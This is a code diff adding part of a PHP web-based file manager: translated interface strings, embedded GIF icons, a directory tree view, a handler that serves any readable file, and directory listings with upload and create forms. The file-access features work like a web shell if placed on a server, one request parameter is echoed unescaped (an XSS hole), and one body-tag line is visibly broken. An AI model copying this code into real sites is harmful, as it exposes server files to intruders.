+		$words['deleted'] = '1 wurde gel&ouml;scht.'; $words['notdeleted'] = '1 konnte nicht gel&ouml;scht werden.'; $words['suredelete'] = '1 wirklich l&ouml;schen?';
+		$words['saved'] = '1 wurde gespeichert.'; $words['notsaved'] = '1 konnte nicht gespeichert werden.';
+		$words['reset'] = 'zur&uuml;cksetzen'; $words['clear'] = 'verwerfen'; $words['save'] = 'speichern';
+		$words['cantbeshown'] = '1 kann nicht angezeigt werden.'; $words['sourceof'] = 'Quelltext von 1';
+		$words['notopened'] = '1 konnte nicht ge&ouml;ffnet werden.';
+		$words['addauth'] = 'Standard-Authentifizierungseinstellungen hinzuf&uuml;gen';
+		$words['username'] = 'Benutzername'; $words['password'] = 'Kennwort'; $words['add'] = 'hinzuf&uuml;gen';
+		$words['treeon'] = 'Baumansicht aktivieren'; $words['treeoff'] = 'Baumansicht deaktivieren';
+		$words['symlink'] = 'Symbolischer Link'; $words['createsymlink'] = 'Link erstellen'; $words['target'] = 'Ziel';
+		$words['reltarget'] = 'Relative Pfadangabe des Ziels';
+		$words['alreadyexists'] = 'Die Datei existiert bereits.';
+		$words['overwrite'] = 'Soll 1 &uuml;berschrieben werden?';
+		$words['samefiles'] = '1 und 2 sind identisch.';
+		break;
+	case 'cz':
+		$words['dir'] = 'Adres&#xE1;&#x0159;'; $words['file'] = 'Soubor';
+		$words['filename'] = 'Jm&#xE9;no souboru'; $words['size'] = 'Velikost'; $words['permission'] = 'Pr&#xE1;va'; $words['functions'] = 'Functions';
+		$words['owner'] = 'Vlastn&#xED;k'; $words['group'] = 'Skupina'; $words['other'] = 'Ostatn&#xED;';
+		$words['create'] = 'vytvo&#x0159;it'; $words['copy'] = 'kop&#xED;rovat'; $words['copyto'] = 'kop&#xED;rovat do'; $words['move'] = 'p&#x0159;esunout'; $words['moveto'] = 'p&#x0159;esunout do'; $words['delete'] = 'odstranit'; $words['edit'] = '&#xFA;pravy';
+		$words['read'] = '&#x010D;ten&#xED;'; $words['write'] = 'z&#xE1;pis'; $words['exec'] = 'spu&#x0161;t&#x011B;n&#xED;'; $words['change'] = 'zm&#x011B;nit'; $words['upload'] = 'nahr&#xE1;t'; $words['configure'] = 'nastaven&#xED;';
+		$words['yes'] = 'ano'; $words['no'] = 'ne';
+		$words['back'] = 'zp&#xE1;tky'; $words['setperms'] = 'nastav pr&#xE1;va';
+		$words['readingerror'] = 'Chyba p&#x0159;i &#x010D;ten&#xED; 1';
+		$words['permsset'] = 'P&#x0159;&#xED;stupov&#xE1; pr&#xE1;va k 1 byla nastavena na 2.'; $words['permsnotset'] = 'P&#x0159;&#xED;stupov&#xE1; pr&#xE1;va k 1 nelze  nastavit na 2.';
+		$words['uploaded'] = 'Soubor 1 byl ulo&#x017E;en do adres&#xE1;&#x0159;e 2.'; $words['notuploaded'] = 'Chyba p&#x0159;i ukl&#xE1;d&#xE1;n&#xED; souboru 1 do adres&#xE1;&#x0159;e 2.';
+		$words['moved'] = 'Soubor 1 byl p&#x0159;esunut do adres&#xE1;&#x0159;e 2.'; $words['notmoved'] = 'Soubor 1 nelze p&#x0159;esunout do adres&#xE1;&#x0159;e 2.';
+		$words['copied'] = 'Soubor 1 byl zkop&#xED;rov&#xE1;n do adres&#xE1;&#x0159;e 2.'; $words['notcopied'] = 'Soubor 1 nelze zkop&#xED;rovat do adres&#xE1;&#x0159;e 2.';
+		$words['created'] = '1 byl vytvo&#x0159;en.'; $words['notcreated'] = '1 nelze vytvo&#x0159;it.';
+		$words['deleted'] = '1 byl vymaz&#xE1;n.'; $words['notdeleted'] = '1 nelze vymazat.'; $words['suredelete'] = 'Skute&#x010D;n&#x011B; smazat 1?';
+		$words['saved'] = 'Soubor 1 byl ulo&#x017E;en.'; $words['notsaved'] = 'Soubor 1 nelze ulo&#x017E;it.';
+		$words['reset'] = 'zp&#x011B;t'; $words['clear'] = 'vy&#x010D;istit'; $words['save'] = 'ulo&#x017E;';
+		$words['cantbeshown'] = "1 can't be shown."; $words['sourceof'] = 'source of 1';
+		$words['notopened'] = "1 nelze otev&#x0159;&#xED;t";
+		$words['addauth'] = 'p&#x0159;idat z&#xE1;kladn&#xED;-authentifikaci';
+		$words['username'] = 'U&#x017E;ivatelsk&#xE9; jm&#xE9;no'; $words['password'] = 'Heslo'; $words['add'] = 'p&#x0159;idat';
+		$words['treeon'] = 'Zobraz strom adres&#xE1;&#x0159;&#x016F;'; $words['treeoff'] = 'Skryj strom adres&#xE1;&#x0159;&#x016F;';
+		$words['symlink'] = 'Symbolick&#xFD; odkaz'; $words['createsymlink'] = 'vytvo&#x0159;it odkaz'; $words['target'] = 'C&#xED;l';
+		$words['reltarget'] = 'Relativni cesta k c&#xED;li';
+		$words['alreadyexists'] = 'Tento soubor u&#x017E; existuje.';
+		$words['overwrite'] = 'P&#x0159;epsat 1?';
+		$words['samefiles'] = '1 a 2 jsou identick&#xE9;l.';
+		break;
+	case 'it':
+		$words['dir'] = 'Directory'; $words['file'] = 'File';
+		$words['filename'] = 'Nome file'; $words['size'] = 'Dimensioni'; $words['permission'] = 'Permessi'; $words['functions'] = 'Funzioni';
+		$words['owner'] = 'Proprietario'; $words['group'] = 'Gruppo'; $words['other'] = 'Altro';
+		$words['create'] = 'crea'; $words['copy'] = 'copia'; $words['copyto'] = 'copia su'; $words['move'] = 'muovi'; $words['moveto'] = 'muove su'; $words['delete'] = 'delete'; $words['edit'] = 'edit';
+		$words['read'] = 'leggi'; $words['write'] = 'scrivi'; $words['exec'] = 'esegui'; $words['change'] = 'modifica'; $words['upload'] = 'upload'; $words['configure'] = 'configura';
+		$words['yes'] = 'si'; $words['no'] = 'no';
+		$words['back'] = 'back'; $words['setperms'] = 'imposta permessi';
+		$words['readingerror'] = 'Errore durante la lettura di 1';
+		$words['permsset'] = 'I permessi di 1 sono stati impostati a 2.'; $words['permsnotset'] = 'I permessi di 1 non possono essere impostati.';
+		$words['uploaded'] = '1 è stato uploadato su 2.'; $words['notuploaded'] = 'Errore durante l\'upload di 1 su 2.';
+		$words['moved'] = '1 è stato spostato su 2.'; $words['notmoved'] = '1 non può essere spostato su 2.';
+		$words['copied'] = '1 è stato copiato su 2.'; $words['notcopied'] = '1 non può essere copiato su 2.';
+		$words['created'] = '1 è stato creato.'; $words['notcreated'] = 'impossibile creare 1.';
+		$words['deleted'] = '1 è stato eliminato.'; $words['notdeleted'] = 'Impossibile eliminare 1.'; $words['suredelete'] = 'Confermi eliminazione di 1?';
+		$words['saved'] = '1 è stato salvato.'; $words['notsaved'] = 'Impossibile salvare 1.';
+		$words['reset'] = 'reimposta'; $words['clear'] = 'pulisci'; $words['save'] = 'salva';
+		$words['cantbeshown'] = "Impossibile visualizzare 1."; $words['sourceof'] = 'sorgente di 1';
+		$words['notopened'] = "Impossibile aprire 1";
+		$words['addauth'] = 'aggiunge autenticazione di base';
+		$words['username'] = 'Nome Utente'; $words['password'] = 'Password'; $words['add'] = 'add';
+		$words['treeon'] = 'Abilita vista ad albero'; $words['treeoff'] = 'Disabilita vista ad albero';
+		$words['symlink'] = 'Link simbolico'; $words['createsymlink'] = 'crea symlink'; $words['target'] = 'Target';
+		$words['reltarget'] = 'Percorso relativo al target';
+		$words['alreadyexists'] = 'Questo file esiste già.';
+		$words['overwrite'] = 'Sovrascrivi 1?';
+		$words['samefiles'] = '1 e 2 sono identici.';
+		break;
+	case 'en':
+	default:
+		$words['dir'] = 'Directory'; $words['file'] = 'File';
+		$words['filename'] = 'Filename'; $words['size'] = 'Size'; $words['permission'] = 'Permission'; $words['functions'] = 'Functions';
+		$words['owner'] = 'Owner'; $words['group'] = 'Group'; $words['other'] = 'Other';
+		$words['create'] = 'create'; $words['copy'] = 'copy'; $words['copyto'] = 'copy to'; $words['move'] = 'move'; $words['moveto'] = 'move to'; $words['delete'] = 'delete'; $words['edit'] = 'edit';
+		$words['read'] = 'read'; $words['write'] = 'write'; $words['exec'] = 'execute'; $words['change'] = 'change'; $words['upload'] = 'upload'; $words['configure'] = 'configure';
+		$words['yes'] = 'yes'; $words['no'] = 'no';
+		$words['back'] = 'back'; $words['setperms'] = 'set permission';
+		$words['readingerror'] = 'Error during read of 1';
+		$words['permsset'] = 'The permission of 1 were set to 2.'; $words['permsnotset'] = 'The permission of 1 could not be set.';
+		$words['uploaded'] = '1 has been uploaded to 2.'; $words['notuploaded'] = 'Error during upload of 1 to 2.';
+		$words['moved'] = '1 has been moved to 2.'; $words['notmoved'] = '1 could not be moved to 2.';
+		$words['copied'] = '1 has been copied to 2.'; $words['notcopied'] = '1 could not be copied to 2.';
+		$words['created'] = '1 has been created.'; $words['notcreated'] = '1 could not be created.';
+		$words['deleted'] = '1 has been deleted.'; $words['notdeleted'] = '1 could not be deleted.'; $words['suredelete'] = 'Really delete 1?';
+		$words['saved'] = '1 has been saved.'; $words['notsaved'] = '1 could not be saved.';
+		$words['reset'] = 'reset'; $words['clear'] = 'clear'; $words['save'] = 'save';
+		$words['cantbeshown'] = "1 can't be shown."; $words['sourceof'] = 'source of 1';
+		$words['notopened'] = "1 couldn't be opened";
+		$words['addauth'] = 'add basic-authentification';
+		$words['username'] = 'Username'; $words['password'] = 'Password'; $words['add'] = 'add';
+		$words['treeon'] = 'Enable treeview'; $words['treeoff'] = 'Disable treeview';
+		$words['symlink'] = 'Symbolic link'; $words['createsymlink'] = 'create link'; $words['target'] = 'Target';
+		$words['reltarget'] = 'Relative path to target';
+		$words['alreadyexists'] = 'This file already exists.';
+		$words['overwrite'] = 'Overwrite 1?';
+		$words['samefiles'] = '1 and 2 are identical.';
+	}
+	return $words;
+}
+
+function getimage ($iid) {
+	$image = 'GIF89a';
+	switch ($iid) {
+	case  1: $image .= "\23\0\22\0\242\4\0\0\0\0\377\377\377\314\314\314\231\231\231\377\377\377\0\0\0\0\0\0\0\0\0!\371\4\1\350\3\4\0,\0\0\0\0\23\0\22\0\0\3?H\272\334N \312\327@\270\30P%\273\237\213\205\215\244\240q\201\240\256\254:\234P\332\316o(\317l\215\342\255\36\363\71\230\5\270\362\15\211\2cr\300l:\231\60\310g\272\251Z\257\330l5\1\0;\0"; break;
+	case  2: $image .= "\23\0\22\0\221\2\0\0\0\0\314\314\314\377\377\377\0\0\0!\371\4\1\350\3\2\0,\0\0\0\0\23\0\22\0\0\2\64\224\217\251\2\355\233@\230\24@#\251v\357d\15V^H\6\26fr\352\312\230ehI\337;\305\63}6\364\206\356\365\350\63!V\304\323\345\210L*\227\220\2\0;\0"; break;
+	case  3: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\32\214o\200\313\355\255\236\234,\322+-\336K\363\357}[(^d9\235hP\0\0;\0"; break;
+	case  4: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2.\234\217\251\313\355\17\15\230\224:\20\262\16\340j\241u\15\226\201\231\310\140\302\272rC\207\36d\140\272\343\27z\333yUU\4\14\12\207DF\1\0;\0"; break;
+	case  5: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2*\234\217\251\313\355\17\15\230\224:\20\262\16\340n\335\65\330\307y\302y\226]\210\214\37\273\270\33\254\310\340UU\321\316\367\376\317(\0\0;\0"; break;
+	case  6: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\33\214o\200\313\355\255\236\234,\322+-\336K\371\360q\224\46rd\211\235\350\270\76\5\0;\0"; break;
+	case  7: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2\60\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\234\320\201PGr\46\263\11\256\373\15\312*\243\245f\253\270\247?\330O\11\206\204\304a\221R\0\0;\0"; break;
+	case  8: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2/\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\36\7B#\251\5\302\272~\203R\46\247\373\210c\274\330\36\216\140\76\5\14\5\207B\42\245\0\0;\0"; break;
+	case  9: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\30\214o\200\313\355\255\236\234,\322+-\336K\371\360q\342H\226\346\211r\5\0;\0"; break;
+	case 10: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2/\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\234\320\201PGr\46\263\11\256\373\15\312*\243\245f\253\270\247?\330O\11\12\207\304\242\260\0\0;\0"; break;
+	case 11: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2.\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\36\7B#\251\5\302\272~\203R\46\247\373\210c\274\330\36\216\140\76\5\14\12\207\304\140\1\0;\0"; break;
+	case 12: $image .= "\21\0\15\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2-\234\201\211\306\15\1\343j\354\211+\302\3\364D\231t\26\206i\342\207r\324Hf\252\203~o\25\264\227\271\306\322i\273\247\216s(\206\257\2\0;\0"; break;
+	case 13: $image .= "\21\0\15\0\221\3\0\314\0\0\377\377\377\231\231\231\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2-\234\201\211\306\15\1\343j\354\211+\302\3\364D\231t\26\206i\342\207r\324Hf\252\203~o\25\264\227\271\306\322i\273\247\216s(\206\257\2\0;\0"; break;
+	case 14: $image .= "\21\0\15\0\242\4\0\231\231\231\377\377\377\0\0\0\314\0\0\377\377\377\0\0\0\0\0\0\0\0\0!\371\4\1\350\3\4\0,\0\0\0\0\21\0\15\0\0\3\71H\12\334\254\60\202@\353\213p\212-\302\4\330RYM8\15\3\305y\46\205\216,\204\316s\260\305\12M\217 6\5/[\247\47\1\246\140\304\314\210\63l\301,\46\207\224\230\0\0;\0"; break;
+	case 15: $image .= "\21\0\15\0\221\3\0\231\231\231\377\377\377\314\314\314\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2*\234\217\231\300\254\33b\4\317\264\213\235\225\274\13:\0\201@\226\46\11\212\347\372m\354\231\216o\31\317\264k\267a\216\36\331o(\0\0;\0"; break;
+	case 16: $image .= "\21\0\15\0\221\2\0\0\0\0\377\377\0\377\377\377\0\0\0!\371\4\1\350\3\2\0,\0\0\0\0\21\0\15\0\0\2,\224\217\251\2\355\260\14\10\263\322\65\203\336\32\246\7\66_\325P\245x\224\34\207J\344vzi\7wJf\342\62\202\263\21\23\372\11\17\5\0;\0"; break;
+	case  0:
+	default: $image .= "\23\0\22\0\200\1\0\0\0\0\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\20\214\217\251\313\355\17\243\234\264\332\213\263\336\274\327\2\0;\0"; break;
+	}
+	return $image;
+}
+
+function tree_hassubdirs ($path) {
+	if ($p = @opendir($path)) {
+		while (($filename = readdir($p)) !== FALSE) {
+			if (tree_isrealdir($path . $filename)) return TRUE;
+		}
+	}
+	return FALSE;
+}
+
+function tree_isrealdir ($path) {
+	if (basename($path) != '.' && basename($path) != '..' && @is_dir($path) && !@is_link($path)) return TRUE; else return FALSE;
+}
+
+function treeview () {
+	global $self, $treeroot;
+	if (isset($_GET['plus']))	tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $_GET['plus']);
+	if (isset($_GET['minus']))	$dirchanged = tree_minus($_SESSION['tree'], $_SESSION['hassubdirs'], $_GET['minus']); else $dirchanged = FALSE;
+	for ($d = $_SESSION['dir']; strlen($d = dirname($d)) != 1; tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $d));
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
+<html>
+<head>
+	<title>Treeview</title>
+	<style type="text/css">
+	<!--
+		td { font-family: sans-serif; font-size: 10pt; }
+		a:link, a:visited, a:active { text-decoration: none; color: #000088; }
+		a:hover { text-decoration: underline; color: #000088; }
+	-->
+	</style>
+</head>
+<body bgcolor="#FFFFFF"<?php if ($dirchanged) echo(" '$self?noupdate=TRUE&dir=" . urlencode($_SESSION['dir']) . '&' . SID . '&pmru=' . time() . "'))\""); ?>>
+	<table border="0" cellspacing="0" cellpadding="0">
+<?php
+	tree_showtree($_SESSION['tree'], $_SESSION['hassubdirs'], $treeroot, 0, tree_calculatenumcols($_SESSION['tree'], $treeroot, 0));
+?>
+	</table>
+</body>
+</html>
+<?php
+	return;
+}
+
+function frameset () {
+	global $self;
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Frameset//EN">
+<html>
+<head>
+	<title><?php echo($self); ?></title>
+</head>
+<frameset cols="250,*">
+	<frame src="<?php echo("$self?frame=treeview&" . SID . '#' . urlencode($_SESSION['dir'])); ?>" name="treeview">
+	<frame src="<?php echo("$self?" . SID); ?>" name="webadmin">
+</frameset>
+</html>
+<?php
+	return;
+}
+
+function tree_calculatenumcols ($tree, $path, $col) {
+	static $numcols = 0;
+	if ($col > $numcols) $numcols = $col; 
+	if (isset($tree[$path])) {
+		for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+			$numcols = tree_calculatenumcols($tree, $path . $tree[$path][$i], $col + 1);
+		}
+	} 
+	return $numcols;
+}
+
+function tree_showtree ($tree, $hassubdirs, $path, $col, $numcols) {
+	global $self, $treeroot;
+	static $islast = array(0 => TRUE);
+	echo("	<tr>\n");
+	for ($i = 0; $i < $col; $i++) {
+		if ($islast[$i]) $iid = 0; else $iid = 3;
+		echo("		<td><img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\"></td>\n");
+	}
+	if ($hassubdirs[$path]) {
+		if (!empty($tree[$path])) { $action = 'minus'; $iid = 8; } else { $action = 'plus'; $iid = 7; }
+		if ($col == 0) $iid -= 3; else if ($islast[$col]) $iid += 3;
+		echo("		<td><a href=\"$self?frame=treeview&$action=" . urlencode($path) . '&dir=' . urlencode($_SESSION['dir']) . '&' . SID . '#' . urlencode($path) . '">');
+		echo("<img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\" border=\"0\">");
+		echo("</a></td>\n");
+	} else {
+		if ($islast[$col]) $iid = 9; else $iid = 6;
+		echo("		<td><img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\"></td>\n");
+	}
+	if (@is_readable($path)) {
+		$a1 = "<a name=\"" . urlencode($path) . "\" href=\"$self?dir=" . urlencode($path) . '&' . SID . '" target="webadmin">';
+		$a2 = '</a>';
+	} else {
+		$a1 = $a2 = '';
+	}
+	if ($_SESSION['dir'] == $path) $iid = 2; else $iid = 1;
+	echo("		<td>$a1<img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\" border=\"0\">$a2</td>\n");
+	$cspan = $numcols - $col + 1;
+	if ($cspan > 1) $colspan = " colspan=\"$cspan\""; else $colspan = '';
+	if ($col == $numcols) $width = ' width="100%"'; else $width = '';
+	echo("		<td$width$colspan nowrap>&nbsp;");
+	if ($path == $treeroot) $label = $path; else $label = basename($path);
+	echo($a1 . htmlentities($label) . $a2);
+	echo("</td>\n");
+	echo("	</tr>\n");
+	if (!empty($tree[$path])) {
+		for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+			if (($i + 1) == sizeof($tree[$path])) $islast[$col + 1] = TRUE; else $islast[$col + 1] = FALSE;
+			tree_showtree($tree, $hassubdirs, $path . $tree[$path][$i], $col + 1, $numcols);
+		}
+	}
+	return;
+}
+
+function tree_plus (&$tree, &$hassubdirs, $p) {
+	if ($path = spath(realpath($p))) {
+		$tree[$path] = tree_getsubdirs($path);
+		for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+			$subdir = $path . $tree[$path][$i];
+			if (empty($hassubdirs[$subdir])) $hassubdirs[$subdir] = tree_hassubdirs($subdir);
+		}
+	}
+	return;
+}
+
+function tree_minus (&$tree, &$hassubdirs, $p) {
+	$dirchanged = FALSE;
+	if ($path = spath(realpath($p))) {
+		if (!empty($tree[$path])) {
+			for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+				$subdir = $path . $tree[$path][$i] . '/';
+				if (isset($hassubdirs[$subdir])) $hassubdirs[$subdir] = NULL;
+			}
+			$tree[$path] = NULL;
+			if (substr($_SESSION['dir'], 0, strlen($path)) == $path) {
+				$_SESSION['dir'] = $path;
+				$dirchanged = TRUE;
+			}
+		}
+	}
+	return $dirchanged;
+}
+
+function tree_getsubdirs ($path) {
+	$subdirs = array();
+	if ($p = @opendir($path)) {
+		for ($i = 0; ($filename = readdir($p)) !== FALSE;) {
+			if (tree_isrealdir($path . $filename)) $subdirs[$i++] = $filename . '/';
+		}
+	}
+	sort($subdirs);
+	return $subdirs;
+}
+
+function show ($file) {
+	global $words;
+	if (@is_readable($file) && @is_file($file)) {
+		header('Content-Disposition: filename=' . basename($file));
+		header('Content-Type: ' . getmimetype($file));
+		if (@readfile($file) !== FALSE) return TRUE;
+	}
+	return FALSE;
+}
+
+function show_highlight ($file) {
+	global $words;
+	if (@is_readable($file) && @is_file($file)) {
+		header('Content-Disposition: filename=' . basename($file));
+		echo("<html>\n<head><title>");
+		echo(buildphrase(array('&quot;' . htmlentities(basename($file)) . '&quot;'), $words['sourceof']));
+		echo("</title></head>\n<body>\n<table cellpadding=\"4\" border=\"0\">\n<tr>\n<td>\n<code style=\"color: #999999\">\n");
+		$size = sizeof(file($file));
+		for ($i = 1; $i <= $size; $i++) printf("%05d<br>\n", $i);
+		echo("</code>\n</td>\n<td nowrap>\n");
+		$shown = @highlight_file($file);
+		echo("\n");
+		echo("</td>\n</tr>\n</table>\n");
+		echo("</body>\n");
+		echo("</html>");
+		if ($shown) return TRUE;
+	}
+	return FALSE;
+}
+
+function getmimetype ($file) {
+	/* $mime = 'application/octet-stream'; */
+	$mime = 'text/plain';
+	$ext = substr($file, strrpos($file, '.') + 1);
+	if (@is_readable('/etc/mime.types')) {
+		$f = fopen('/etc/mime.types', 'r');
+		while (!feof($f)) {
+			$line = fgets($f, 4096);
+			$found = FALSE;
+			$mim = strtok($line," \n\t");
+			$ex = strtok(" \n\t");
+			while ($ex && !$found) {
+				if (strtolower($ex) == strtolower($ext)) {
+					$found = TRUE;
+					$mime = $mim;
+					break;
+				}
+				$ex = strtok(" \n\t");
+			}
+			if ($found) break;
+		}
+		fclose($f);
+	}
+	return $mime;
+}
+
+function dirlisting ($inaframe = FALSE) {
+	global $self, $homedir, $words;
+	global $error, $notice;
+	$p = '&' . SID;
+	html_header($_SESSION['dir']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE" colspan="2">
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td><?php echo("<a href=\"$self?dir=" . urlencode($homedir) . "$p\">" . $words['dir']); ?></a>:&nbsp;</td>
+				<td><input type="text" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>" size="<?php echo(textfieldsize($_SESSION['dir'])); ?>">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['change']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php if (@is_writable($_SESSION['dir'])) { ?>
+	<form action="<?php echo($self); ?>" method="post" enctype="multipart/form-data">
+	<input type="hidden" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+<?php if (isset($_REQUEST['frame'])) { ?>
+	<input type="hidden" name="frame" value="<?php echo($_REQUEST['frame']); ?>">
+<?php } ?>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE">
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td><?php echo($words['file']); ?>&nbsp;</td>
+				<td><input type="file" name="upload">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['upload']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE">
+			</form>
+			<form action="<?php echo($self); ?>" method="get">
+			<input type="hidden" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>">
+			<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+<?php if (isset($_REQUEST['frame'])) { ?>
+			<input type="hidden" name="frame" value="<?php echo($_REQUEST['frame']); ?>">
+<?php } ?>
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td>
+					<select name="type" size="1">
+					<option value="file"><?php echo($words['file']); ?>
+
+					<option value="dir" selected><?php echo($words['dir']); ?>
+
+					</select>&nbsp;
+				</td>
+				<td><input type="text" name="create">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['create']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+	}
+	if (empty($_GET['sort'])) $sort = 'filename'; else $sort = $_GET['sort'];
+	$reverse = @$_GET['reverse'];
+	$GLOBALS['showsize'] = FALSE;
+	if ($files = dirtoarray($_SESSION['dir'])) {
+		$files = sortfiles($files, $sort, $reverse);
+		outputdirlisting($_SESSION['dir'], $files, $inaframe, $sort, $reverse);
+	} else {
+		perror(buildphrase('&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot', $words['readingerror']));
+	}
+	if ($inaframe) {
+		pnotice("<a href=\"$self?action=treeoff&" . SID . '" target="_top">' . $words['treeoff'] . '</a>');
+	} else {
+		pnotice("<a href=\"$self?action=treeon&" . SID . '" target="_top">' . $words['treeon'] . '</a>');
+	}
+	html_footer(FALSE);
+	return;
+}
+
+function dirtoarray ($dir) {
+	if ($dirstream = @opendir($dir)) {
+		for ($n = 0; ($filename = readdir($dirstream)) !== FALSE; $n++) {
+			$stat = @lstat($dir . $filename);
+			$files[$n]['filename']     = $filename;
+			$files[$n]['fullfilename'] = $fullfilename = relpathtoabspath($filename, $dir);
+			$files[$n]['is_file']      = @is_file($fullfilename);
+			$files[$n]['is_dir']       = @is_dir($fullfilename);
+			$files[$n]['is_link']      = $islink = @is_link($dir . $filename);
+			if ($islink) {
+				$files[$n]['readlink'] = @readlink($dir . $filename);
+				$files[$n]['linkinfo'] = linkinfo($dir . $filename);
+			}
+			$files[$n]['is_readable']   = @is_readable($fullfilename);
+			$files[$n]['is_writable']   = @is_writable($fullfilename);
+			$files[$n]['is_executable'] = @is_executable($fullfilename);
+			$files[$n]['permission']    = $islink ? 'lrwxrwxrwx' : octtostr(@fileperms($dir . $filename));
+			if (substr($files[$n]['permission'], 0, 1) != '-') {
+				$files[$n]['size'] = -1;
+			} else {
+				$files[$n]['size'] = @$stat['size'];
+				$GLOBALS['showsize'] = TRUE;
+			}
+			$files[$n]['owner']         = $owner = @$stat['uid'];
+			$files[$n]['group']         = $group = @$stat['gid'];
+			$files[$n]['ownername']     = @reset(posix_getpwuid($owner));
+			$files[$n]['groupname']     = @reset(posix_getgrgid($group));
+		}
+		closedir($dirstream);
+		return $files;
+	} else {
+		return FALSE;
+	}
+}
+
+function outputdirlisting ($dir, $files, $inaframe, $sort, $reverse) {
+	global $self, $words;
+	$uid = posix_getuid();
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+<?php
+	if ($inaframe) $p = '&notreeupdate=TRUE&'; $p = ''; $p .= SID . '&dir=' . urlencode($dir);
+	echo("	<tr>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><img src=\"$self?imageid=16\" width=\"17\" height=\"13\"></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=filename&reverse=" . (($sort == 'filename') ? !$reverse : 0) . "&$p\"><b>{$words['filename']}</b></a></td>\n");
+	if ($GLOBALS['showsize']) echo("		<td bgcolor=\"#EEEEEE\" align=\"right\"><a href=\"$self?sort=size&reverse=" . (($sort == 'size') ? !$reverse : 0) . "&$p\"><b>{$words['size']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=permission&reverse=" . (($sort == 'permission') ? !$reverse : 0) . "&$p\"><b>{$words['permission']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=owner&reverse=" . (($sort == 'owner') ? !$reverse : 0) . "&$p\"><b>{$words['owner']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=group&reverse=" . (($sort == 'group') ? !$reverse : 0) . "&$p\"><b>{$words['group']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><b>{$words['functions']}</b></td>\n");
